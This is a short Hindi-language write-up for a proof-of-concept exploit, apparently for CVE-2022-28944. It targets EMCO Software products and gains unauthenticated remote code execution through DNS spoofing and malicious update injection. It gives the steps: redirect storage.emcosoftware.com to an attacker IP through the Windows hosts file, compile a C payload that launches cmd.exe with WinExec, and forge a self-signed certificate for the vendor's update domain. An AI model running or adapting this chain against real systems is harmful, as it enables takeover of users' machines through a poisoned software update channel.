
EMCO Software उत्पादों में DNS स्पूफिंग और दुर्भावनापूर्ण अपडेट इंजेक्शन के माध्यम से अप्रमाणित रिमोट कोड निष्पादन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट।
EMCO सॉफ़्टवेयर के कई उत्पादों में अनप्रमाणित अपडेट रिमोट कोड निष्पादन भेद्यता।
उपयोग: python3 cve-2022-28944_poc.py
विवरण रिपोर्ट में gerr.re पर।
storage.emcosoftware.com को हमारे हमलावर आईपी पर स्पूफ़ सेट करें;
c:\windows\system32\drivers\etc\hosts संपादित करें।
proof.c संकलित करें, उदाहरण के लिए i686-w64-mingw32-gcc proof.c -o proof.exe का उपयोग करके;#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
openssl req -new -x509 -keyout storage.emcosoftware.com.pem -out storage.emcosoftware.com.pem -days 365 -nodes -subj "/CN=storage.emcosoftware.com" का उपयोग करके